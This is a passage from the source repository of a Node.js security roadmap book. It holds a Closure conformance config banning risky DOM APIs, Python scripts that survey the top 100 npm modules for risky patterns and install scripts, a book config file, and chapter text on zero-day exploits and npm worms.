 45 |   type: RESTRICTED_METHOD_CALL
 46 | 
 47 |   value: 'Window.prototype.setTimeout:function(string, ...?)'
 48 |   value: 'Window.prototype.setImmediate:function(string, ...?)'
 49 |   value: 'Window.prototype.setInterval:function(string, ...?)'
 50 |   value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'
 51 | 
 52 |   error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
 53 | }
 54 | 
 55 | requirement: {
 56 |   type: BANNED_PROPERTY
 57 |   error_message: 'Arguments.prototype.callee'
 58 | 
 59 |   value: 'Arguments.prototype.callee'
 60 | 
 61 |   whitelist: 'javascript/closure/base.js'  # goog.base uses arguments.callee
 62 |   whitelist: 'javascript/closure/debug/'  # legacy stack trace support, etc
 63 | }
 64 | 
 65 | requirement: {
 66 |   type: BANNED_PROPERTY_WRITE
 67 |   error_message: 'Assignment to Element.prototype.innerHTML is not allowed'
 68 | 
 69 |   value: 'Object.innerHTML'
 70 | 
 71 |   # Safe wrapper for this property.
 72 |   whitelist: 'javascript/closure/dom/safe.js'
 73 | 
 74 |   # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
 75 |   # innerHTML is a single HTML entity.
 76 |   whitelist: 'javascript/closure/string/string.js'
 77 | }
 78 | 
 79 | requirement: {
 80 |   type: BANNED_PROPERTY_WRITE
 81 |   error_message: 'Assignment to Element.prototype.outerHTML is not allowed'
 82 | 
 83 |   value: 'Object.outerHTML'
 84 | 
 85 |   # Safe wrapper for this property.
 86 |   whitelist: 'javascript/closure/dom/safe.js'
 87 | }
 88 | 
 89 | requirement: {
 90 |   type: BANNED_PROPERTY_WRITE
 91 |   error_message: 'Assignment to Location.prototype.href is not allowed'
 92 | 
 93 |   value: 'Location.prototype.href'
 94 | 
 95 |   # Safe wrapper for this property.
 96 |   whitelist: 'javascript/closure/dom/safe.js'
 97 | }
 98 | 
 99 | requirement: {
100 |   type: BANNED_PROPERTY_WRITE
101 |   error_message: 'Assignment to location is not allowed'
102 | 
103 |   value: 'Window.prototype.location'
104 | }
105 | 
106 | requirement: {
107 |   type: BANNED_PROPERTY_WRITE
108 |   error_message: 'Assignment to .href property or src'
109 | 
110 |   # Types with .href properties that do not extend from Element.
111 | #  value: 'StyleSheet.prototype.href'
112 | #  value: 'CSSImportRule.prototype.href'
113 | 
114 |   # All other types extend from Element.
115 | #  value: 'Element.prototype.href'
116 |   value: 'Object.href'
117 |   value: 'Object.src'
118 | 
119 |   # Safe wrapper for this property.
120 |   whitelist: 'javascript/closure/dom/safe.js'
121 | }
122 | 
123 | requirement: {
124 |   rule_id: 'setAttribute URL'
125 |   type: BANNED_CODE_PATTERN
126 |   error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
127 |   value:
128 |       '/**\n'
129 |       ' * @param {*} element\n'
130 |       ' * @param {?} value\n'
131 |       ' */\n'
132 |       'function template(element, value) {'
133 |       '  element.setAttribute(\'src\', value);'
134 |       '}'
135 |   value:
136 |       '/**\n'
137 |       ' * @param {*} element\n'
138 |       ' * @param {?} value\n'
139 |       ' */\n'
140 |       'function template(element, value) {\n'
141 |       '  element.setAttribute(\'href\', value);\n'
142 |       '}'
143 | }
144 | 
145 | requirement: {
146 |   type: BANNED_PROPERTY_WRITE
147 |   error_message: 'Use of document.domain is not allowed'
148 | 
149 |   value: 'Document.prototype.domain'
150 | }
151 | 


--------------------------------------------------------------------------------
/appendix/jsconf/experiment.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | """
  4 | Runs JSConformance on each of the top 100 modules and collates the results.
  5 | """
  6 | 
  7 | # Copyright 2017 Google LLC
  8 | #
  9 | # Licensed under the Apache License, Version 2.0 (the "License");
 10 | # you may not use this file except in compliance with the License.
 11 | # You may obtain a copy of the License at
 12 | #
 13 | #     https://www.apache.org/licenses/LICENSE-2.0
 14 | #
 15 | # Unless required by applicable law or agreed to in writing, software
 16 | # distributed under the License is distributed on an "AS IS" BASIS,
 17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 18 | # See the License for the specific language governing permissions and
 19 | # limitations under the License.
 20 | 
 21 | import json
 22 | import os.path
 23 | import py_common.npm
 24 | import re
 25 | import shutil
 26 | import subprocess
 27 | import sys
 28 | 
 29 | 
 30 | _error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
 31 | # Patterns that can be used to group error messages by glossing over
 32 | # any content not in a capturing group.
 33 | _simplifier_res = (
 34 |     re.compile(r'^(required ").*?(" namespace not provided yet)'),
 35 |     re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
 36 |     re.compile(r'^(Illegal redeclared variable: ).*'),
 37 |     re.compile(r'^(Parse error[.]).*'),
 38 | )
 39 | 
 40 | 
 41 | def run_jsconf(node_modules, module_name, externs):
 42 |     """
 43 |     Runs JSConformance on the given module's source files.
 44 |     """
 45 |     srcs = py_common.npm.js_srcs_almost_worst_case(
 46 |         node_modules, module_name,
 47 |         module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
 48 |     if not srcs:
 49 |         raise Exception(module_name + ' has no srcs')
 50 |     args = [
 51 |         'java',
 52 |         '-jar',
 53 |         os.path.join(
 54 |             os.path.dirname(node_modules),
 55 |             'tools',
 56 |             'closure-compiler-latest',
 57 |             'closure-compiler.jar'),
 58 |         '--process_common_js_modules',
 59 |         '--checks-only',
 60 |         '--third_party=true',
 61 |         '--module_resolution=NODE',
 62 |         '--js_module_root=%s' % os.path.realpath(node_modules),
 63 |         '--jscomp_error=conformanceViolations',
 64 |         '--conformance_configs',
 65 |         os.path.join(
 66 |             os.path.dirname(node_modules),
 67 |             'jsconf',
 68 |             'conformance_proto.textproto'),
 69 |     ]
 70 |     for (_, js_file) in srcs:
 71 |         args += ['--js', os.path.realpath(js_file)]
 72 |     for js_file in sorted(externs):
 73 |         args += ['--externs', js_file]
 74 |     #print >>sys.stderr, len(' '.join(args))
 75 |     if len(' '.join(args)) >= 240000:  # `getconf ARG_MAX` for Mac OSX
 76 |         return ['Argument list too long']
 77 |     process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
 78 |     content = process.stdout.read()
 79 |     retcode = process.wait()
 80 |     violations = []
 81 |     if retcode == 0:
 82 |         violations.append('Passed')
 83 |     for match in _error_re.finditer(content):
 84 |         violation = match.group(1)
 85 |         for simpler in _simplifier_res:
 86 |             match = simpler.match(violation)
 87 |             if match:
 88 |                 violation = '...'.join(match.groups())
 89 |         violations.append(violation)
 90 |     return violations
 91 | 
 92 | if __name__ == '__main__':
 93 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
 94 | 
 95 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
 96 | 
 97 |     externs = set()
 98 |     for externs_file in py_common.npm.js_files_under(
 99 |             os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
100 |         if os.path.basename(os.path.dirname(externs_file)) == 'tests':
101 |             continue
102 |         externs.add(externs_file)
103 | 
104 |     # Maps rule identifiers to sets of offending modules.
105 |     rule_violations = {}
106 | 
107 | 
108 |     module_count = 0
109 |     for module_name in top100:
110 |         violations = run_jsconf(node_modules, module_name, externs)
111 |         if ('Parse error.' in violations
112 |             or 'Argument list too long' in violations):
113 |             pass
114 |         else:
115 |             module_count += 1
116 |         for v in violations:
117 |             if v in rule_violations:
118 |                 vmap = rule_violations[v]
119 |             else:
120 |                 vmap = rule_violations[v] = {}
121 |             vmap[module_name] = vmap.get(module_name, 0) + 1
122 | 
123 |     # TODO: exclude Parse error and Argument list too long
124 | 
125 |     print "## JS Conformance {#jsconf}"
126 |     print ""
127 |     print "JS Conformance identifies uses of risky APIs."
128 |     print ""
129 |     print "Some modules did not parse.  This may be dues to typescript."
130 |     print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript"
131 |     print "inputs."
132 |     print ""
133 |     print "If a module is both in the top 100 and is a dependency of another"
134 |     print "module in the top 100, then it will be multiply counted."
135 |     print ""
136 |     print "Out of %d modules that parsed" % module_count
137 |     print ""
138 |     print "| Violation | Count of Modules | Total Count | Quartiles |"
139 |     print "| --------- | ---------------- | ----------- | --------- |"
140 |     for (v, vmap) in sorted(rule_violations.items()):
141 |         count = 0
142 |         total_count = 0
143 |         values = vmap.values()
144 |         for n in values:
145 |             count += 1
146 |             total_count += n
147 |         values += [0] * (module_count - count)
148 |         values.sort()
149 |         quartiles = '%d / %d / %d' % (
150 |             values[len(values) >> 2],
151 |             values[len(values) >> 1],
152 |             values[(len(values) * 3) >> 2],
153 |         )
154 |         print "| `%s` | %d | %d | %s |" % (
155 |             v, count, total_count, quartiles)
156 | 


--------------------------------------------------------------------------------
/appendix/lazy-load/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for lazy loading patterns.
18 | 
19 | Patterns to identify include
20 | 
21 |   * { ... require(...)
22 | 
23 | """
24 | 
25 | import json
26 | import os.path
27 | import py_common.npm
28 | import re
29 | import shutil
30 | import sys
31 | 
32 | 
33 | lazy_load_pattern = re.compile(
34 |     r'[{][^}]*(?<![_$\w.])require\s*\(')
35 | 
36 | def find_lazy_load(node_modules, module_name):
37 |     return py_common.npm.js_srcs_matching(
38 |         node_modules, module_name, lazy_load_pattern,
39 |         module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
40 | 
41 | 
42 | if __name__ == '__main__':
43 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
44 | 
45 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
46 | 
47 |     uses = 0
48 |     total_count = 0
49 |     has_lazy_load = {}
50 |     for module_name in top100:
51 |         js_srcs = find_lazy_load(node_modules, module_name)
52 |         has_lazy_load[module_name] = js_srcs
53 |         if len(js_srcs):
54 |             uses += 1
55 |         total_count += 1
56 | 
57 |     print (
58 | """
59 | ## Lazy loads {#lazy_load}
60 | 
61 | Lazy loading can complicate code bundling if care is not taken.
62 | 
63 | %d of %d = %1.02f%% contain a use of require inside a `{...}` block.
64 | """ % (uses, total_count, (100.0 * uses) / total_count))
65 | 


--------------------------------------------------------------------------------
/appendix/py_common/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/appendix/py_common/npm.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Utilities for mucking with NPM packages
  3 | """
  4 | 
  5 | # Copyright 2017 Google LLC
  6 | #
  7 | # Licensed under the Apache License, Version 2.0 (the "License");
  8 | # you may not use this file except in compliance with the License.
  9 | # You may obtain a copy of the License at
 10 | #
 11 | #     https://www.apache.org/licenses/LICENSE-2.0
 12 | #
 13 | # Unless required by applicable law or agreed to in writing, software
 14 | # distributed under the License is distributed on an "AS IS" BASIS,
 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 16 | # See the License for the specific language governing permissions and
 17 | # limitations under the License.
 18 | 
 19 | import json
 20 | import os
 21 | import os.path
 22 | import re
 23 | import subprocess
 24 | import sys
 25 | import tempfile
 26 | 
 27 | import jslex.jslex
 28 | 
 29 | def install_packages(*package):
 30 |     """
 31 |     Creates a temporary node_modules directory with the given packages
 32 |     and returns it.
 33 |     """
 34 |     tmp_dir = tempfile.mkdtemp()
 35 |     tmp_node_modules_dir = os.path.join(tmp_dir, 'node_modules')
 36 |     os.mkdir(tmp_node_modules_dir)
 37 |     subprocess.check_call([
 38 |         'npm', 'install', '--ignore-scripts', '--only=prod',
 39 |         '-g', '--prefix', tmp_node_modules_dir,
 40 |         '--'] + list(package))
 41 |     return tmp_node_modules_dir
 42 | 
 43 | 
 44 | def for_each_npm_package(node_modules_dir, f):
 45 |     """
 46 |     Calls f with each package directory path.
 47 | 
 48 |     Returns an object with the result of each call keyed by
 49 |     package name.
 50 | 
 51 |     For a dir tree like
 52 |        node_modules
 53 |          foo
 54 |            package.json
 55 |            ...
 56 |          bar
 57 |            package.json
 58 |            ...
 59 |          baz
 60 |            package.json
 61 |            ...
 62 |          .bin
 63 |            ...
 64 |     returns
 65 |         {
 66 |           'bar': f('node_modules/bar'),
 67 |           'baz': f('node_modules/baz'),
 68 |           'foo': f('node_modules/foo')
 69 |         }
 70 |     """
 71 |     result = {}
 72 |     for fname in os.listdir(node_modules_dir):
 73 |         if fname not in ('.', '..'):
 74 |             if os.path.isfile(os.path.join(node_modules_dir, fname, 'package.json')):
 75 |                 result[fname] = f(os.path.join(node_modules_dir, fname))
 76 |     return result
 77 | 
 78 | def ignore_tools_that_can_run_early(module_name):
 79 |     """
 80 |     A module filter that filters out dependencies on modules that
 81 |     can be run during the bundling/validation process so are not strictly
 82 |     necessary at runtime.
 83 |     """
 84 |     return lambda mn: mn == module_name or not (
 85 |         mn.startswith('babel')
 86 |         or mn.startswith('eslint'))
 87 | 
 88 | _REQUIRE_RE = re.compile(r'(?<![\w.])require\s*[(]([^\)]*)')
 89 | _REL_REQUIRE_RE = re.compile(r'^[.][.]?/')
 90 | 
 91 | def js_srcs_almost_worst_case(node_modules, module_name, module_filter=None):
 92 |     """
 93 |     The set of JS & TS source files required by a module
 94 |     including those required by prod dependencies.
 95 | 
 96 |     This does not take into account TS imports.
 97 | 
 98 |     This is not entirely conservative.
 99 |     We make an optimistic assumption that a dynamic load,
100 |     a require(x) where x is not a string literal, only
101 |     loads files from the same module.
102 |     This is not true, e.g. when bazel-core loads extension
103 |     modules.
104 |     These cross-module loads need not only load from prod
105 |     dependencies, so assuming otherwise would not actually
106 |     make us conservative either.
107 | 
108 |     Returns [('module', '/abs/path/to/src.js'), ...]
109 |     """
110 |     if module_filter is None:
111 |         module_filter = lambda _: True
112 |     js_files = set()
113 |     unprocessed = [module_name]
114 |     visited = set()
115 |     while unprocessed:
116 |         up_module_name = unprocessed.pop()
117 |         if up_module_name in visited: continue
118 |         visited.add(up_module_name)
119 |         if not module_filter(up_module_name): continue
120 |         rq = None
121 |         try:
122 |             rq = requires(node_modules, module_name)
123 |         except:
124 |             import traceback
125 |             traceback.print_exc()
126 |         if rq is not None and rq['upper']:
127 |             js_files.update([(up_module_name, src) for src in rq['srcs']])
128 |             unprocessed += rq['deps']
129 |         else:
130 |             #print >>sys.stderr, "Falling back to worst-case for %s required by %s" % (
131 |             #    up_module_name, module_name)
132 |             js_files.update([(up_module_name, src) for src in
133 |                              js_files_under(
134 |                                  os.path.join(node_modules, up_module_name))
135 |                              if not probable_non_prod_file(src)])
136 |             package_json = None
137 |             try:
138 |                 package_json = json.loads(
139 |                     file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
140 |                     .read())
141 |             except:
142 |                 print >>sys.stderr, "Undeclared dependency %s" % up_module_name
143 |             if package_json is not None:
144 |                 unprocessed += package_json['dependencies'].keys()
145 |     return tuple(sorted(js_files))
146 | 
147 | def requires(node_modules, module_name):
148 |     """
149 |     Follows require() calls to bound the set of JS files in a module.
150 | 
151 |     Returns {
152 |       'srcs': [...],  # main.js and same-module files required thereof
153 |       'deps': [...],  # required modules
154 |       'upper': True,  # True when srcs and deps accounts for all require calls.
155 |     }
156 |     """
157 |     module_root = os.path.join(node_modules, module_name)
158 |     package_json = json.loads(
159 |         file(os.path.join(module_root, 'package.json')).read())
160 |     main_files = package_json.get('main', None)
161 |     if type(main_files) in (str, unicode):
162 |         main_files = (main_files,)
163 |     if not main_files:
164 |         return { 'srcs': (), 'deps': (), 'upper': False }
165 |     srcs = set()
166 |     deps = set()
167 |     upper = True
168 |     visited = set()
169 |     unprocessed = [os.path.join(module_root, rp) for rp in main_files]
170 |     while unprocessed:
171 |         src = os.path.realpath(unprocessed.pop())
172 |         if src in visited: continue
173 |         visited.add(src)
174 |         if os.path.isdir(src):
175 |             for f in js_files_under(src):
176 |                 unprocessed.append(f)
177 |         else:
178 |             srcs.add(src)
179 |             content = ''
180 |             try:
181 |                 content = file(src, 'r').read()
182 |             except:
183 |                 upper = False
184 |             for match in _REQUIRE_RE.finditer(content):
185 |                 arg = match.group(1).strip()
186 |                 if not arg:
187 |                     pass  # Zero arguments
188 |                 elif len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1]:
189 |                     try:
190 |                         arg = json.loads('"%s"' % arg[1:-1])
191 |                     except:
192 |                         #print >>sys.stderr, "Cannot parse require argument %s" % arg
193 |                         upper = False
194 |                     if _REL_REQUIRE_RE.match(arg):
195 |                         if not arg.endswith('.js'): arg += '.js'
196 |                         unprocessed.append(arg)
197 |                     else:
198 |                         deps.add(arg)
199 |                 else:
200 |                     upper = False
201 |     return {
202 |         'srcs': tuple(sorted(srcs)),
203 |         'deps': tuple(sorted(deps)),
204 |         'upper': upper
205 |     }
206 | 
207 | def js_files_under(root_dir):
208 |     for dir_path, subdir_list, file_list in os.walk(root_dir):
209 |         for f in file_list:
210 |             if f.endswith('.js') or f.endswith('.ts'):
211 |                 yield os.path.join(dir_path, f)
212 | 
213 | def preprocess_js_content(content):
214 |     """
215 |     Preprocesses JS content to make it easier to operate on.
216 | 
217 |     All comments are replaced with spaces, and string literal
218 |     content is upper-cased to make it easier to distinguish
219 |     lower-case keywords and identifiers from similar content that
220 |     appears inside a string literal.
221 |     """
222 | 
223 |     lexer = jslex.jslex.JsLexer()
224 |     canon_tokens = []
225 |     for (tok_type, tok_content) in lexer.lex(content):
226 |         if tok_type in ('comment', 'linecomment'):
227 |             tok_content = ' '
228 |         elif tok_type in ('regex', 'string'):
229 |             tok_content = tok_content.upper()
230 |         canon_tokens.append(tok_content)
231 |     processed_content = ''.join(canon_tokens)
232 | 
233 |     return processed_content
234 | 
235 | def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
236 |     """
237 |     A list of srcs under root_dir whose content
238 |     matches pattern.
239 |     """
240 | 
241 |     srcs = js_srcs_almost_worst_case(
242 |         node_modules=node_modules,
243 |         module_name=module_name,
244 |         module_filter=module_filter)
245 | 
246 |     matching_srcs = []
247 |     for src in srcs:
248 |         (_, path) = src
249 |         canon_content = preprocess_js_content(file(path, 'r').read())
250 |         match = pattern.search(canon_content)
251 |         if match:
252 |             matching_srcs.append(src)
253 |     return matching_srcs
254 | 
255 | # by visual examination of
256 | # `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
257 | _NON_PROD_PATH = re.compile(
258 |     r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|.github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
259 | def probable_non_prod_file(path):
260 |     """
261 |     Skip probable non test files when falling back to directory scanning.
262 |     """
263 |     return _NON_PROD_PATH.search(path) is not None
264 | 


--------------------------------------------------------------------------------
/appendix/test-code/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for test code patterns under node_modules.
18 | 
19 | Patterns identify include
20 | 
21 |   * require('assert')
22 |   * require('chai')
23 |   * require('chai/*')
24 |   * require('mocha')
25 |   * require('should')
26 |   * require('unexpected')
27 | 
28 | """
29 | 
30 | import json
31 | import os.path
32 | import py_common.npm
33 | import re
34 | import shutil
35 | import sys
36 | 
37 | 
38 | test_code_pattern = re.compile(
39 |     r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]|mocha|should|unexpected)[\'\"]')
40 | 
41 | 
42 | if __name__ == '__main__':
43 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
44 | 
45 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
46 | 
47 |     uses = 0
48 |     total_count = 0
49 |     has_test_code = {}
50 |     for module_name in top100:
51 |         module_root = os.path.join(separate_modules, module_name)
52 |         for js_file in py_common.npm.js_files_under(module_root):
53 |             js_content = file(js_file, 'r').read()
54 |             if test_code_pattern.search(js_content):
55 |                 uses += 1
56 |                 break
57 |         total_count += 1
58 | 
59 |     print (
60 | """
61 | ## Prod bundle includes test code {#test_code}
62 | 
63 | Some of the top 100 modules are test code, e.g. mocha, chai.
64 | This measures which modules, when installed `--only=prod` include
65 | test patterns.
66 | 
67 | %d of %d = %1.02f%% contain test code patterns
68 | """ % (uses, total_count, (100.0 * uses) / total_count))
69 | 


--------------------------------------------------------------------------------
/appendix/top100.txt:
--------------------------------------------------------------------------------
  1 | async
  2 | babel-core
  3 | babel-preset-es2015
  4 | babel-runtime
  5 | bluebird
  6 | body-parser
  7 | chalk
  8 | cheerio
  9 | classnames
 10 | coffee-script
 11 | colors
 12 | commander
 13 | debug
 14 | express
 15 | fs-extra
 16 | glob
 17 | gulp
 18 | gulp-util
 19 | jquery
 20 | lodash
 21 | minimist
 22 | mkdirp
 23 | moment
 24 | prop-types
 25 | q
 26 | react
 27 | react-dom
 28 | request
 29 | rxjs
 30 | through2
 31 | underscore
 32 | uuid
 33 | webpack
 34 | winston
 35 | yargs
 36 | yeoman-generator
 37 | @angular/common
 38 | @angular/core
 39 | aws-sdk
 40 | axios
 41 | babel-loader
 42 | babel-polyfill
 43 | chai
 44 | co
 45 | core-js
 46 | css-loader
 47 | ejs
 48 | ember-cli-babel
 49 | eslint
 50 | handlebars
 51 | inquirer
 52 | joi
 53 | js-yaml
 54 | mocha
 55 | mongodb
 56 | mongoose
 57 | node-uuid
 58 | object-assign
 59 | optimist
 60 | ramda
 61 | react-redux
 62 | redis
 63 | redux
 64 | request-promise
 65 | rimraf
 66 | semver
 67 | shelljs
 68 | socket.io
 69 | superagent
 70 | xml2js
 71 | yosay
 72 | zone.js
 73 | @angular/compiler
 74 | @angular/forms
 75 | @angular/http
 76 | @angular/platform-browser
 77 | @angular/platform-browser-dynamic
 78 | @types/node
 79 | angular
 80 | autoprefixer
 81 | babel-eslint
 82 | babel-preset-react
 83 | bootstrap
 84 | cookie-parser
 85 | dotenv
 86 | es6-promise
 87 | eslint-plugin-react
 88 | extend
 89 | extract-text-webpack-plugin
 90 | file-loader
 91 | immutable
 92 | jade
 93 | jsonwebtoken
 94 | marked
 95 | mime
 96 | morgan
 97 | mysql
 98 | nan
 99 | node-sass
100 | path
101 | promise
102 | react-router
103 | style-loader
104 | typescript
105 | uglify-js
106 | underscore.string
107 | vue
108 | ws
109 | 


--------------------------------------------------------------------------------
/appendix/uses-scripts/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Collates how many projects use install scripts.
18 | 
19 | Per https://docs.npmjs.com/misc/scripts we look for the
20 | following keys under "scripts" in package.json:
21 | 
22 |   * preinstall
23 |   * install
24 |   * postinstall
25 | """
26 | 
27 | import json
28 | import os.path
29 | import py_common.npm
30 | import sys
31 | 
32 | def uses_scripts(package_root):
33 |     package_json = json.loads(
34 |         file(os.path.join(package_root, 'package.json')).read())
35 |     scripts_obj = package_json.get('scripts', None)
36 |     if scripts_obj is None:
37 |         return False
38 |     for script_type in ('preinstall', 'install', 'postinstall'):
39 |         # TODO: True if empty value
40 |         if script_type in scripts_obj: return True
41 |     return False
42 | 
43 | if __name__ == '__main__':
44 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
45 | 
46 |     per_package = py_common.npm.for_each_npm_package(
47 |         node_modules, uses_scripts)
48 |     total_count = 0
49 |     uses_scripts = 0
50 |     for uses in per_package.itervalues():
51 |         if uses:
52 |             uses_scripts += 1
53 |         total_count += 1
54 |     print (
55 | """
56 | ## Uses Scripts {#uses_scripts}
57 | 
58 | Unless steps are taken, installation scripts run code on
59 | a developer's workstation when they have write access to
60 | local repositories.  If this number is small, having
61 | humans check installation scripts before running might
62 | be feasible.
63 | 
64 | %d of %d = %1.02f%% use installation scripts
65 | """ % (uses_scripts, total_count, (100.0 * uses_scripts) / total_count))
66 | 


--------------------------------------------------------------------------------
/book.json.withcomments:
--------------------------------------------------------------------------------
 1 | # Comments are stripped
 2 | {
 3 |     "root": ".",
 4 |     "structure": {
 5 |         "readme": "cover.md"
 6 |     },
 7 |     "title": "A Roadmap for Node.js Security",
 8 |     "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them.  Assumes a basic familiarity with JS & the Node ecosystem.",
 9 |     "author": "Mike Samuel et al",
10 |     "language": "en",
11 |     "gitbook": ">= 3.0.0",
12 |     "plugins": [
13 |         "links",
14 |         "ga"
15 |     ],
16 |     "pluginsConfig": {
17 |         # Google Analytics integration
18 |         "ga": {
19 |             "token": "UA-111883728-1",
20 |             "configuration": {
21 |                 "anonymizeIp": true,
22 |                 "forceSSL": true
23 |             }
24 |         },
25 |         "links": {
26 |             "links": [
27 |                 {
28 |                     # Adds a printer icon at the top.
29 |                     # See styles/website.css for styling.
30 |                     "label": "Printable",
31 |                     # "icon" corresponds to a classname
32 |                     "icon": "print-button",
33 |                     # `make pdf` produces book.json which
34 |                     # needs to be copied into _book/ for
35 |                     # this to work.
36 |                     # TODO: Point to an authoritative version
37 |                     # via absolute URL once published.
38 |                     "url": "/node-sec-roadmap.pdf"
39 |                 },
40 |                 {
41 |                     "label": "Github",
42 |                     "icon": "github-button",
43 |                     "url": "https://github.com/google/node-sec-roadmap"
44 |                 }
45 |             ]
46 |         }
47 |     }
48 | }
49 | 


--------------------------------------------------------------------------------
/chapter-1/recap.md:
--------------------------------------------------------------------------------
 1 | We've discussed the kinds of threats that concern us.
 2 | 
 3 | Next we discuss how some Node.js projects mitigate these threats today
 4 | and how we can make it easier for more Node.js projects to
 5 | consistently mitigate these threats.
 6 | 
 7 | Readers may find it useful to refer back to the [threat table][] which
 8 | cross-indexes threats and mitigation strategies.
 9 | 
10 | [threat table]: threats.md#threat_table
11 | 


--------------------------------------------------------------------------------
/chapter-1/threat-0DY.md:
--------------------------------------------------------------------------------
 1 | # Zero Day
 2 | 
 3 | When a researcher discloses a new security vulnerability, the clock
 4 | starts ticking.  An attacker can compromise a product if they can
 5 | weaponize the disclosure before the product team
 6 | 
 7 | *  realizes they're vulnerable, and
 8 | *  finds a patch to the vulnerable dependency, or rolls their own, and
 9 | *  tests the patched release and pushes it into production.
10 | 
11 | ["The Best Defenses Against Zero-day Exploits for Various-sized
12 | Organizations"][sans] notes
13 | 
14 | > Zero-day exploits are vulnerabilities that have yet to be publicly
15 | > disclosed. These exploits are usually the most difficult to defend
16 | > against because data is generally only available for analysis after
17 | > the attack has completed its course.
18 | 
19 | > ...
20 | 
21 | > The research community has broadly classified the defense techniques
22 | > against zero-day exploits as statistical-based, signature-based,
23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
24 | > primary goal of each of these techniques is to identify the exploit in
25 | > real time or as close to real time as possible and quarantine the
26 | > specific attack to eliminate or minimize the damage caused by the
27 | > attack.
28 | 
29 | Being able to respond quickly to limit damage and recover are
30 | critical.
31 | 
32 | That same paper talks at length about *worms*: programs that
33 | compromise a system without explicit direction by a human attacker,
34 | and use the compromise of one system to find other systems to
35 | automatically compromise.
36 | 
37 | Researchers have found ways ([details][saccone]) that worms
38 | might propagate throughout `registry.npmjs.org` and common practices
39 | that might allow a compromise to jump from the module repository to
40 | large numbers of production servers.
41 | 
42 | If we can structure systems so that compromising one component
43 | does not make it easier to compromise another component, then
44 | we can contain damage due to worms.
45 | 
46 | If, in a population of components, we can keep susceptibility below a
47 | critical threshold so that worms spend more time searching for targets
48 | than compromising targets, then we can buy time for humans to
49 | understand and respond.
50 | 
51 | If we prevent compromise of a population of modules by a zero day
52 | from causing widespread compromise of a population of production
53 | servers then we can limit damage to end users.
54 | 
55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
57 | 


--------------------------------------------------------------------------------
/chapter-1/threat-BOF.md:
